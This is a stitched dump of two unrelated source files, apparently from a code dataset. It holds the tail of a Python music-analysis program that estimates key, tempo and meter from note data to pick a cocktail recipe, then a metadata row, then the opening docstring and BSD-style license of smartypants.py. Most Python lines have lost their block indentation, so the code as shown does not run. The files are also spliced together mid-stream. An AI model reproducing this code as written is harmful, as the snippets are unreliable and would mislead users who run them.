recette1 = ''.join(recette)
return recette1
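# Worked example for the recipe mapping above (illustrative inputs): with
# duree = 120 s, complexite = 0.5, tonalite = 3 (D major) and tempo = 100 bpm,
# RECETTE returns 'alc03 3 sj3 3 ' (spirit #3, dose 3, major soda #3, dose 3);
# the virtuosity extra is skipped because complexite <= 0.7.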
def TONALITE(note_piece):
size_piece = note_piece.shape
nbnotes_piece = size_piece[0]
####################################################
    # KEY ESTIMATION
####################################################
#
    # Key:
# key_piece = kkkey(note_piece)
# Key of NMAT according to the Krumhansl-Kessler algorithm
# k = kkkey(nmat)
# Returns the key of NMAT according to the Krumhansl-Kessler algorithm.
#
# Input argument:
# NOTE_PIECE = notematrix
#
# Output:
# K = estimated key of NMAT encoded as a number
# encoding: C major = 1, C# major = 2, ...
# c minor = 13, c# minor = 14, ...
#
# Remarks:
#
# See also KEYMODE, KKMAX, and KKCC.
#
# Example:
#
# Reference:
# Krumhansl, C. L. (1990). Cognitive Foundations of Musical Pitch.
# New York: Oxford University Press.
#
# Author Date
# P. Toiviainen 8.8.2002
# © Part of the MIDI Toolbox, Copyright © 2004, University of Jyvaskyla, Finland
# See License.txt
# Correlations of pitch-class distribution with Krumhansl-Kessler tonal hierarchies
# c = kkcc(nmat, <opt>)
# Returns the correlations of the pitch class distribution PCDIST1
# of NMAT with each of the 24 Krumhansl-Kessler profiles.
#
# Input arguments:
# NMAT = notematrix
# OPT = OPTIONS (optional), 'SALIENCE' return the correlations of the
# pitch-class distribution according to the Huron & Parncutt (1993)
# key-finding algorithm.
#
# Output:
# C = 24-component vector containing the correlation coeffients
# between the pitch-class distribution of NMAT and each
# of the 24 Krumhansl-Kessler profiles.
#
# Remarks: REFSTAT function is called to load the key profiles.
#
# Example: c = kkcc(nmat, 'salience')
#
# See also KEYMODE, KKMAX, and KKKEY in the MIDI Toolbox.
#
# References:
# Krumhansl, C. L. (1990). Cognitive Foundations of Musical Pitch.
# New York: Oxford University Press.
#
# Huron, D., & Parncutt, R. (1993). An improved model of tonality
# perception incorporating pitch salience and echoic memory.
# Psychomusicology, 12, 152-169.
#
pc = note_piece[:, 3] % 12
tau = 0.5
accent_index = 2
dur = note_piece[:, 6]
dur_acc = (1 - np.exp(-dur / tau))**accent_index
    # !!! FJ: this should be rewritten so that pcds is used in the form
    # np.zeros(12)
pcds = np.zeros([1, 12])
size_pc = pc.shape[0]
for k in np.arange(size_pc):
pcds[0, int(pc[k])] = pcds[0, int(pc[k])] + dur_acc[k]
pcds = pcds / np.sum(pcds + 1e-12)
kkprofs = np.array([
[0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18],
[0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14],
[0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22],
[0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15],
[0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32],
[0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25, 0.15],
[0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27, 0.25],
[0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14, 0.27],
[0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21, 0.14],
[0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14, 0.21],
[0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39, 0.14],
[0.14, 0.21, 0.14, 0.27, 0.25, 0.15, 0.32, 0.15, 0.22, 0.14, 0.18, 0.39],
[0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19],
[0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20],
[0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16],
[0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24],
[0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28],
[0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21, 0.15],
[0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15, 0.21],
[0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32, 0.15],
[0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21, 0.32],
[0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16, 0.21],
[0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38, 0.16],
[0.16, 0.21, 0.32, 0.15, 0.21, 0.15, 0.28, 0.24, 0.16, 0.20, 0.19, 0.38]])
tmp_mat = np.vstack([pcds, kkprofs]).transpose()
[n, p] = tmp_mat.shape
covpcds = tmp_mat - np.dot(np.ones([n, p]), np.mean(tmp_mat))
covpcds = np.dot(covpcds.transpose(), covpcds) / (n - 1)
    # !!! FJ: is it intentional that this is commented out?
    # YES, the equivalent is most likely coded directly just above
# covpcds = cov([pcds; kkprofs]'); # SCILAB: corr
c2 = np.zeros(24)
for k in np.arange(1, 25):
c2[k - 1] = covpcds[0, k] / np.sqrt(covpcds[0, 0] * covpcds[k, k])
tonalite = np.argmax(c2) + 1
return tonalite
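# Note (illustrative, not part of the original code): conceptually, c2 holds the
# correlation of the duration-weighted pitch-class distribution with each of the
# 24 Krumhansl-Kessler profiles; a rough equivalent sketch would be
#   c2 = [np.corrcoef(pcds[0], prof)[0, 1] for prof in kkprofs]
# although the code above centres the stacked matrix on its global mean rather
# than on per-column means, so the numbers can differ slightly. The estimated
# key is argmax(c2) + 1 (1-12 major, 13-24 minor).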
def TEMPO(note_piece):
    # !!! FJ: this function should be rewritten in vectorized form (it is full of
    # loops and quite hard to read...)
size_piece = note_piece.shape
nbnotes_piece = size_piece[0]
    # !!! FJ: the case where only one note is present makes the algorithm crash
    # -> we will have to decide how to handle this case; for now I add a
    # test and return an arbitrary value
if nbnotes_piece == 1:
tempo = 1.
return tempo
####################################################
    # TEMPO ESTIMATION
####################################################
    # Compute the end of each note (in seconds) and replace the
    # "duration in beats" column
note_piece[:, 1] = note_piece[:, 5] + note_piece[:, 6]
    # COUNT OF DISTINCT EVENTS (i.e. ONE CHORD = ONE EVENT)
    # Note_classees matrix:
    # Column 1: onset time of the strike (in seconds)
    # Column 2: end time of the note (in seconds)
    # Column 3: number of keys struck at once
Dur_min = np.min(note_piece[:, 6])
tolerance = max(Dur_min / 3, 0.05)
Nb_att = 1
Note_classees = np.zeros([nbnotes_piece, 3])
Note_classees[0, 0] = note_piece[0, 5]
Note_classees[0, 1] = note_piece[0, 1]
    # !!! FJ: isn't something missing to handle Note_classees[0, 2]?
    # here it is 0
    # YES, it must be initialized to 1 to account for the note that has just
    # been classified
Note_classees[0, 2] = 1
Last_time = note_piece[0, 5]
dtim1 = 0.1
for i in np.arange(1, nbnotes_piece):
dti = note_piece[i, 5] - Last_time
        if dti >= tolerance:  # the two notes are not simultaneous
Nb_att += 1
Note_classees[Nb_att - 1, 0] = note_piece[i, 5]
Note_classees[Nb_att - 1, 1] = note_piece[i, 1]
Note_classees[Nb_att - 1, 2] = 1
Last_time = note_piece[i, 5]
        else:  # the two notes are simultaneous
Note_classees[Nb_att - 1, 2] += 1
    # MARK / WEIGHT THE EVENTS TO DERIVE A RHYTHMIC WEIGHT
Poids_tempo = np.zeros([Nb_att, 6])
Poids_tempo[:, 0] = Note_classees[:Nb_att, 0]
    # Marking No. 1: successive inter-onset values that are close/equal
Poids_tempo[0, 1] = 1 # Initialisation
for i in np.arange(2, Nb_att):
dti = Note_classees[i, 0] - Note_classees[i - 1, 0]
dtim1 = Note_classees[i - 1, 0] - Note_classees[i - 2, 0]
if abs(dtim1 - dti) <= 0.2 * dtim1:
Poids_tempo[i, 1] = 1
    # Marking No. 2: lengthened intervals between attacks
Poids_tempo[0, 2] = 1 # Initialisation
for i in np.arange(1, Nb_att - 1):
dti = Note_classees[i, 0] - Note_classees[i - 1, 0]
dtip1 = Note_classees[i + 1, 0] - Note_classees[i, 0]
if dtip1 / dti <= 1.2:
Poids_tempo[i, 2] = 1
    # Marking No. 3: number of notes per chord
Poids_tempo[:, 3] = Note_classees[:Nb_att, 2] - np.ones(Nb_att)
    # Marking No. 4: number of chords ending on a given attack
dist_time = np.zeros(Nb_att)
for i in np.arange(2, Nb_att):
for j in np.arange(Nb_att):
dist_time[j] = np.abs(Note_classees[j, 1] - Note_classees[i, 0])
marq2 = np.nonzero(dist_time <= tolerance)[0]
l = marq2.shape[0]
if l > 0:
Poids_tempo[i, 4] = l - 1
    # !!! FJ: the line below would be better written as a matrix product
Poids_tempo[:, 5] = 1 * Poids_tempo[:, 1] + 1 * Poids_tempo[:,
2] + 2 * Poids_tempo[:, 3] + 2 * Poids_tempo[:, 4]
    # GENERATION OF CANDIDATE BEAT PERIODS
    # Principle: we pick an event
#
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
    # TEMPO OF THE WHOLE PIECE
#
    # Initialization: beat propagation starts at 1/12 of
    # the duration of the piece
    # !!! FJ: I think there is a big bug here in the scilab code, because one of
    # the indices is missing; it uses the matrix as a vector and finds very large indices
    # OK, my fix is correct
indices = np.nonzero(Note_classees[:, 0] > (
Note_classees[Nb_att - 1, 0] / 12))[0]
i1 = max(indices[0], 1)
    # Check that the starting point is indeed a local maximum of the tempo
    # weight (bounded to 1/6 of the length of the piece)
while (i1 < (np.fix(Nb_att / 6.) - 1)) and \
((Poids_tempo[i1 - 1, 5] >= Poids_tempo[i1, 5]) or (Poids_tempo[i1 + 1, 5] >= Poids_tempo[i1, 5])):
i1 += 1
    # Initialization of the beats: time intervals between the starting
    # value and all the notes played so far
    # !!! FJ: Note_classees(1:(i1-1)) implicitly means Note_classees(1:(i1-1),1)), is that really what we want?
    # Why not state the second index explicitly?
    # OK, my fix is correct; since it worked, Tom never noticed ("wild
    # programming")
battuesav = Note_classees[i1, 0] - Note_classees[:i1, 0]
    # !!! FJ: on the file bug_4.pckt, battuesap is [] here and I do not know
    # whether that is correct
battuesap = Note_classees[int((
i1 + 1)):int((i1 + 2 + np.fix(Nb_att / 6))), 0] - Note_classees[i1, 0]
    # !!! FJ: why specify indices into battues, which does not exist yet?
    # OK, Tom did not know it was not necessary
# battues[0:i1+np.fix(Nb_att/6)] = np.vstack([battuesav, battuesap])
battues = np.hstack([battuesav, battuesap])
    # Remove beats longer than 1.3 seconds
    # !!! FJ: some things will have to be adapted here -> notably switching to vectorized code
    # FJ change: in some cases we get a crash because battues contains no
    # beat shorter than 1.3 -> to avoid the crash, we take the minimum of the
    # available beats in that case
if battues.min() < 1.3:
ind_battues = np.nonzero(battues < 1.3)[0]
else:
ind_battues = np.nonzero(battues == battues.min())[0]
Nb_battues = ind_battues.shape[0]
liste_battues = np.zeros([Nb_battues, 3])
for i in np.arange(Nb_battues):
k = ind_battues[i]
liste_battues[i, 0] = battues[k]
    # !!! FJ: scilab sorts in reverse order (from largest to smallest),
    # I have to add [::-1] to invert the order of the results
liste_battues[:, 0] = np.sort(liste_battues[:, 0])[::-1]
for i in np.arange(Nb_battues):
i2 = i1
        # Criterion for propagating a beat:
crit_dist = max(0.1 * liste_battues[i, 0], 2 * tolerance)
        # Find the closest strike
ind_max = min(
i2 + np.floor(liste_battues[i, 0] / tolerance) + 1, Nb_att - 2)
        # !!! FJ: in the limit case where i2 = ind_max (cf. file bug_1.pckt),
        # we get an expression of the form [] - something, and the default
        # behaviour in that case differs between scilab and Python -> this
        # case has to be handled separately.
        # The original code:
# test = np.abs(Note_classees[i2+1:ind_max+1, 0] - Note_classees[i2, 0] - liste_battues[i, 0])
        # becomes:
if i2 >= ind_max:
test = np.abs(Note_classees[i2, 0] + liste_battues[i, 0])
else:
test = np.abs(
Note_classees[int(i2 + 1):int(ind_max + 1), 0] - Note_classees[i2, 0] - liste_battues[int(i), 0])
distance = np.min(test)
ind_possible = np.argmin(test) + 1
        # !!! FJ: this initialization seems useless, to be confirmed
        #temp_batt = [liste_battues[i, 0]]
        # OK as long as it works
temp_batt = []
Nb_prop = 1
while (distance < crit_dist) and ((ind_max) < Nb_att - 1):
Nb_prop += 1
            # !!! FJ: I am not quite sure what the code is supposed to do here,
            # but I find cases in my files (cf. bug_2.pckt) where
            # i2+ind_possible goes past the end of the array -> I add a test,
            # but the proper solution should still be worked out
if i2 + ind_possible < Note_classees.shape[0]:
temp_batt.append(
abs(Note_classees[i2, 0] - Note_classees[i2 + ind_possible, 0]))
else:
break
            # Update the beat (mean of the beats found
            # previously)
            # !!! FJ: there is no point doing these assignments on every while iteration, doing it once at the end would be enough
            # It should be possible to move it out, to be tested
liste_battues[i, 0] = np.mean(temp_batt)
liste_battues[i, 1] = Note_classees[i2 +
ind_possible, 0] - Note_classees[i1, 0]
liste_battues[i, 2] = Nb_prop
# Re-setting for next loop
            # !!! FJ: is what happens here really what we want? ind_possible is not recomputed during the loop
            # YES the comment is wrong, ind_possible is modified on the
            # last line of this loop
i2 += ind_possible
ind_max = min(
i2 + np.floor(liste_battues[i, 0] / tolerance) + 1, Nb_att - 2)
            # !!! FJ: there is an odd case that shows up notably on
            # 'current_super_enerve.pckt'; I have to add an if to reproduce
            # the scilab behaviour in that case, for which
            # []-1 = -1 whereas for numpy []-1 = []
if i2 >= ind_max:
test = np.abs(Note_classees[i2, 0] + liste_battues[i, 0])
else:
# print("ind_max: %s" % ind_max)
# print("i: %s" % i)
# print("i2: %s" % i2)
test = np.abs(Note_classees[(
i2 + 1):int(ind_max) + 1, 0] - Note_classees[i2, 0] - liste_battues[i, 0])
distance = np.min(test)
ind_possible = np.argmin(test) + 1
del temp_batt
    # !!! FJ: I did not quite follow what the algorithm does, but what ends up in
    # liste_battues is a bit dubious (the same row appears several times), to be checked
    # OK, since the algorithm learns the beat, it can adapt and land on the
    # same values
ind_tempo = np.argmax(liste_battues[:, 2])
    # !!! FJ: problem - the order scilab's gsort produces for identical values differs from what I get with np.sort
    # -> to obtain the same result I have to implement my own arggsort function
k = arggsort(liste_battues[:, 2])
battues_classees = np.zeros([Nb_battues, 3])
for i in np.arange(Nb_battues):
battues_classees[i, :] = liste_battues[k[i], 0:3]
    # !!! FJ: dist_batt is defined but never used in the scilab version
    # OK
    # dist_batt = np.zeros([Nb_battues, Nb_battues])
    # If a beat has a multiple in the list, increase its weight
for i in np.arange(Nb_battues):
for j in np.arange(Nb_battues):
            # !!! FJ: I have a file (bug_5.pckt) on which I get a division by 0 here
            # I add a test, but the proper solution should still be worked
            # out
if battues_classees[j, 0] != 0.:
if ((battues_classees[i, 0] / battues_classees[j, 0]) > 1.9) \
and ((battues_classees[i, 0] / battues_classees[j, 0]) < 2.1):
battues_classees[i, 2] = battues_classees[i, 2] * 3.0
    # !!! FJ: I do not quite get why the following code is here; since the beats
    # are not ordered, the while stops on the first one in the list greater
    # than 0.4, but we have no other guarantee on its value
    # if the goal is to remove all values below 0.4,
    # it does not work
    # -> There is indeed a problem; these beat values should be removed much earlier, at the point where we do
# ind_battues = np.nonzero(battues<1.3)[0]
ind_mini = 0
if np.max(battues_classees[:, 0]) > 0.4:
while battues_classees[ind_mini, 0] < 0.4:
ind_mini += 1
ind_tempo = np.argmax(battues_classees[ind_mini:Nb_battues, 2])
    # !!! FJ: the second index is missing in scilab
    # OK
    # !!! FJ: I have a file (bug_5.pckt) on which I get a division by 0 here
    # I add a test, but the proper solution should still be worked out
if battues_classees[ind_tempo + ind_mini, 0] != 0.:
tempo = 60 / battues_classees[ind_tempo + ind_mini, 0]
else:
tempo = 1.
    # FJ !!!: added for the bug_4.pckt file problem. See how to handle this
    # case properly
if tempo < 0.:
tempo = 1.
return tempo
def METRIQUE(note_piece):
####################################################
    # METER ESTIMATION (duple / triple)
####################################################
# Autocorrelation-based estimate of meter
# m = meter(nmat,<option>)
# Returns an autocorrelation-based estimate of meter of NMAT.
# Based on temporal structure and on Thomassen's melodic accent.
# Uses discriminant function derived from a collection of 12000 folk melodies.
# m = 2 for simple duple
# m = 3 for simple triple or compound
#
# Input argument:
# NMAT = notematrix
# OPTION (Optional, string) = Argument 'OPTIMAL' uses a weighted combination
# of duration and melodic accents in the inference of meter (see Toiviainen & Eerola, 2004).
#
# Output:
# M = estimate of meter (M=2 for simple duple; M=3 for simple triple or compound)
#
# References:
# Brown, J. (1993). Determination of the meter of musical scores by
# autocorrelation. Journal of the Acoustical Society of America,
# 94(4), 1953-1957.
# Toiviainen, P. & Eerola, T. (2004). The role of accent periodicities in meter induction:
# a classification study, In x (Ed.), Proceedings of the ICMPC8. xxx:xxx.
#
# Change History :
# Date Time Prog Note
# 11.8.2002 18:36 PT Created under MATLAB 5.3 (Macintosh)
#© Part of the MIDI Toolbox, Copyright © 2004, University of Jyvaskyla, Finland
# See License.txt
    # !!! FJ: why is this here?:
# ac = ofacorr(onsetfunc(nmat,'dur'));
    NDIVS = 4 # four divisions per quarter note
MAXLAG = 8
ob = note_piece[:, 5]
acc = note_piece[:, 6]
vlen = NDIVS * max(2 * MAXLAG, np.ceil(np.max(ob)) + 1)
of = np.zeros(int(vlen))
    # Note FJ: numpy's round function does not use the same convention as scilab
    # for values exactly halfway between two integers (for example 0.5).
    # To get the same behaviour as under scilab, instead of using:
    # ind = np.mod(np.round(ob*NDIVS), of.shape[0])
    # we use Python's default round function, which behaves the same way
    # as scilab does:
my_round = np.vectorize(lambda x: round(x))
ind = np.mod(my_round(ob * NDIVS), of.shape[0])
    # Note FJ: the following loop cannot be replaced by
    # of[ind.astype(int)] += acc
    # because that is not equivalent when ind contains the same index
    # several times
for k in np.arange(ind.shape[0]):
of[int(ind[k])] += acc[k]
    # !!! FJ: possibly store of - of.mean() in a temporary variable here
ac = np.correlate(of - of.mean(), of - of.mean(),
mode='full')[of.shape[0] - 1:]
    # !!! FJ: ind1 and ind2 are defined but not used in scilab
# ind1 = 1;
# ind2 = min(length(ac),MAXLAG*NDIVS+1);
if ac[0] > 0:
ac /= ac[0]
    # !!! FJ: rewrite the for loops below in vectorized form
if ac.shape[0] % 2 > 0.:
for i in np.arange(np.floor(ac.shape[0] / 2)):
ac[i] = ac[2 + 2 * i]
else:
for i in np.arange(np.floor(ac.shape[0] / 2) - 1):
ac[int(i)] = ac[2 + 2 * int(i)]
if ac[3] >= ac[5]:
metrique = 2
else:
metrique = 3
return metrique
if __name__ == '__main__':
# duree, tristesse, Enervement, Complexite, metrique, tonalite, tempo, cocktail = PIANOCKTAIL('current_super_enerve.pckt')
# a1 = "Duree = "+str(duree)+" - Tristesse = "+str(tristesse)+" - Enervement = "+str(Enervement)
# a2 = "Complexite = "+str(Complexite)+" - Metrique = "+str(metrique)+" - Tonalite = "+str(tonalite)
# a3 = "Tempo = "+str(tempo)+" - Cocktail = "+str(cocktail)
# print(a1)
# print(a2)
# print(a3)
precision = '10.13'
import sys
if len(sys.argv) > 1:
precision = sys.argv[1]
from glob import glob
data_dir_path = '.'
if len(sys.argv) > 2:
data_dir_path = sys.argv[2]
file_names = glob(data_dir_path + '/*.pckt')
file_names.sort()
#file_names = ['random_96.pckt']
form = '{:' + precision + 'f}'
for file_name in file_names:
duree, tristesse, Enervement, Complexite, metrique, tonalite, tempo, cocktail = PIANOCKTAIL(
file_name)
print('fichier : ' + file_name)
print('duree : ' + form.format(duree))
print('tristesse : ' + form.format(tristesse))
print('enervement : ' + form.format(Enervement))
print('complexite : ' + form.format(Complexite))
print('metrique : ' + form.format(metrique))
print('tonalite : ' + form.format(tonalite))
print('tempo : ' + form.format(tempo))
print('cocktail : ' + cocktail)
print('')
sys.stdout.flush()
sys.stderr.write(file_name + ' processed by Python\n')
sys.stderr.flush()
sys.stderr.write('\nProcessing by Python finished\n\n')
sys.stderr.flush()
| lgpl-2.1 | -671,513,183,776,288,300 | 38.030189 | 133 | 0.547731 | false |
stone5495/NewsBlur | vendor/typogrify/smartypants.py | 37 | 29160 | #!/usr/bin/python
r"""
==============
smartypants.py
==============
----------------------------
SmartyPants ported to Python
----------------------------
Ported by `Chad Miller`_
Copyright (c) 2004, 2007 Chad Miller
original `SmartyPants`_ by `John Gruber`_
Copyright (c) 2003 John Gruber
Synopsis
========
A smart-quotes plugin for Pyblosxom_.
The original "SmartyPants" is a free web publishing plug-in for Movable Type,
Blosxom, and BBEdit that easily translates plain ASCII punctuation characters
into "smart" typographic punctuation HTML entities.
This software, *smartypants.py*, endeavours to be a functional port of
SmartyPants to Python, for use with Pyblosxom_.
Description
===========
SmartyPants can perform the following transformations:
- Straight quotes ( " and ' ) into "curly" quote HTML entities
- Backticks-style quotes (\`\`like this'') into "curly" quote HTML entities
- Dashes (``--`` and ``---``) into en- and em-dash entities
- Three consecutive dots (``...`` or ``. . .``) into an ellipsis entity
This means you can write, edit, and save your posts using plain old
ASCII straight quotes, plain dashes, and plain dots, but your published
posts (and final HTML output) will appear with smart quotes, em-dashes,
and proper ellipses.
SmartyPants does not modify characters within ``<pre>``, ``<code>``, ``<kbd>``,
``<math>`` or ``<script>`` tag blocks. Typically, these tags are used to
display text where smart quotes and other "smart punctuation" would not be
appropriate, such as source code or example markup.
Backslash Escapes
=================
If you need to use literal straight quotes (or plain hyphens and
periods), SmartyPants accepts the following backslash escape sequences
to force non-smart punctuation. It does so by transforming the escape
sequence into a decimal-encoded HTML entity:
(FIXME: table here.)
.. comment It sucks that there's a disconnect between the visual layout and table markup when special characters are involved.
.. comment ====== ===== =========
.. comment Escape Value Character
.. comment ====== ===== =========
.. comment \\\\\\\\ \ \\\\
.. comment \\\\" " "
.. comment \\\\' ' '
.. comment \\\\. . .
.. comment \\\\- - \-
.. comment \\\\` ` \`
.. comment ====== ===== =========
This is useful, for example, when you want to use straight quotes as
foot and inch marks: 6'2" tall; a 17" iMac.
Options
=======
For Pyblosxom users, the ``smartypants_attributes`` attribute is where you
specify configuration options.
Numeric values are the easiest way to configure SmartyPants' behavior:
"0"
Suppress all transformations. (Do nothing.)
"1"
Performs default SmartyPants transformations: quotes (including
\`\`backticks'' -style), em-dashes, and ellipses. "``--``" (dash dash)
is used to signify an em-dash; there is no support for en-dashes.
"2"
Same as smarty_pants="1", except that it uses the old-school typewriter
shorthand for dashes: "``--``" (dash dash) for en-dashes, "``---``"
(dash dash dash)
for em-dashes.
"3"
Same as smarty_pants="2", but inverts the shorthand for dashes:
"``--``" (dash dash) for em-dashes, and "``---``" (dash dash dash) for
en-dashes.
"-1"
Stupefy mode. Reverses the SmartyPants transformation process, turning
the HTML entities produced by SmartyPants into their ASCII equivalents.
E.g. "“" is turned into a simple double-quote ("), "—" is
turned into two dashes, etc.
The following single-character attribute values can be combined to toggle
individual transformations from within the smarty_pants attribute. For
example, to educate normal quotes and em-dashes, but not ellipses or
\`\`backticks'' -style quotes:
``py['smartypants_attributes'] = "qd"``
"q"
Educates normal quote characters: (") and (').
"b"
Educates \`\`backticks'' -style double quotes.
"B"
Educates \`\`backticks'' -style double quotes and \`single' quotes.
"d"
Educates em-dashes.
"D"
Educates em-dashes and en-dashes, using old-school typewriter shorthand:
(dash dash) for en-dashes, (dash dash dash) for em-dashes.
"i"
Educates em-dashes and en-dashes, using inverted old-school typewriter
shorthand: (dash dash) for em-dashes, (dash dash dash) for en-dashes.
"e"
Educates ellipses.
"w"
Translates any instance of ``"`` into a normal double-quote character.
This should be of no interest to most people, but of particular interest
to anyone who writes their posts using Dreamweaver, as Dreamweaver
inexplicably uses this entity to represent a literal double-quote
character. SmartyPants only educates normal quotes, not entities (because
ordinarily, entities are used for the explicit purpose of representing the
specific character they represent). The "w" option must be used in
conjunction with one (or both) of the other quote options ("q" or "b").
Thus, if you wish to apply all SmartyPants transformations (quotes, en-
and em-dashes, and ellipses) and also translate ``"`` entities into
regular quotes so SmartyPants can educate them, you should pass the
following to the smarty_pants attribute:
The ``smartypants_forbidden_flavours`` list contains pyblosxom flavours for
which no Smarty Pants rendering will occur.
Caveats
=======
Why You Might Not Want to Use Smart Quotes in Your Weblog
---------------------------------------------------------
For one thing, you might not care.
Most normal, mentally stable individuals do not take notice of proper
typographic punctuation. Many design and typography nerds, however, break
out in a nasty rash when they encounter, say, a restaurant sign that uses
a straight apostrophe to spell "Joe's".
If you're the sort of person who just doesn't care, you might well want to
continue not caring. Using straight quotes -- and sticking to the 7-bit
ASCII character set in general -- is certainly a simpler way to live.
Even if you *do* care about accurate typography, you still might want to
think twice before educating the quote characters in your weblog. One side
effect of publishing curly quote HTML entities is that it makes your
weblog a bit harder for others to quote from using copy-and-paste. What
happens is that when someone copies text from your blog, the copied text
contains the 8-bit curly quote characters (as well as the 8-bit characters
for em-dashes and ellipses, if you use these options). These characters
are not standard across different text encoding methods, which is why they
need to be encoded as HTML entities.
People copying text from your weblog, however, may not notice that you're
using curly quotes, and they'll go ahead and paste the unencoded 8-bit
characters copied from their browser into an email message or their own
weblog. When pasted as raw "smart quotes", these characters are likely to
get mangled beyond recognition.
That said, my own opinion is that any decent text editor or email client
makes it easy to stupefy smart quote characters into their 7-bit
equivalents, and I don't consider it my problem if you're using an
indecent text editor or email client.
Algorithmic Shortcomings
------------------------
One situation in which quotes will get curled the wrong way is when
apostrophes are used at the start of leading contractions. For example:
``'Twas the night before Christmas.``
In the case above, SmartyPants will turn the apostrophe into an opening
single-quote, when in fact it should be a closing one. I don't think
this problem can be solved in the general case -- every word processor
I've tried gets this wrong as well. In such cases, it's best to use the
proper HTML entity for closing single-quotes (``’``) by hand.
Bugs
====
To file bug reports or feature requests (other than topics listed in the
Caveats section above) please send email to: mailto:[email protected]
If the bug involves quotes being curled the wrong way, please send example
text to illustrate.
To Do list
----------
- Provide a function for use within templates to quote anything at all.
Version History
===============
1.5_1.6: Fri, 27 Jul 2007 07:06:40 -0400
- Fixed bug where blocks of precious unalterable text was instead
interpreted. Thanks to Le Roux and Dirk van Oosterbosch.
1.5_1.5: Sat, 13 Aug 2005 15:50:24 -0400
- Fix bogus magical quotation when there is no hint that the
user wants it, e.g., in "21st century". Thanks to Nathan Hamblen.
- Be smarter about quotes before terminating numbers in an en-dash'ed
range.
1.5_1.4: Thu, 10 Feb 2005 20:24:36 -0500
- Fix a date-processing bug, as reported by jacob childress.
- Begin a test-suite for ensuring correct output.
- Removed import of "string", since I didn't really need it.
(This was my first every Python program. Sue me!)
1.5_1.3: Wed, 15 Sep 2004 18:25:58 -0400
- Abort processing if the flavour is in forbidden-list. Default of
[ "rss" ] (Idea of Wolfgang SCHNERRING.)
- Remove stray virgules from en-dashes. Patch by Wolfgang SCHNERRING.
1.5_1.2: Mon, 24 May 2004 08:14:54 -0400
- Some single quotes weren't replaced properly. Diff-tesuji played
by Benjamin GEIGER.
1.5_1.1: Sun, 14 Mar 2004 14:38:28 -0500
- Support upcoming pyblosxom 0.9 plugin verification feature.
1.5_1.0: Tue, 09 Mar 2004 08:08:35 -0500
- Initial release
Version Information
-------------------
Version numbers will track the SmartyPants_ version numbers, with the addition
of an underscore and the smartypants.py version on the end.
New versions will be available at `http://wiki.chad.org/SmartyPantsPy`_
.. _http://wiki.chad.org/SmartyPantsPy: http://wiki.chad.org/SmartyPantsPy
Authors
=======
`John Gruber`_ did all of the hard work of writing this software in Perl for
`Movable Type`_ and almost all of this useful documentation. `Chad Miller`_
ported it to Python to use with Pyblosxom_.
Additional Credits
==================
Portions of the SmartyPants original work are based on Brad Choate's nifty
MTRegex plug-in. `Brad Choate`_ also contributed a few bits of source code to
this plug-in. Brad Choate is a fine hacker indeed.
`Jeremy Hedley`_ and `Charles Wiltgen`_ deserve mention for exemplary beta
testing of the original SmartyPants.
`Rael Dornfest`_ ported SmartyPants to Blosxom.
.. _Brad Choate: http://bradchoate.com/
.. _Jeremy Hedley: http://antipixel.com/
.. _Charles Wiltgen: http://playbacktime.com/
.. _Rael Dornfest: http://raelity.org/
Copyright and License
=====================
SmartyPants_ license::
Copyright (c) 2003 John Gruber
(http://daringfireball.net/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name "SmartyPants" nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
smartypants.py license::
smartypants.py is a derivative work of SmartyPants.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
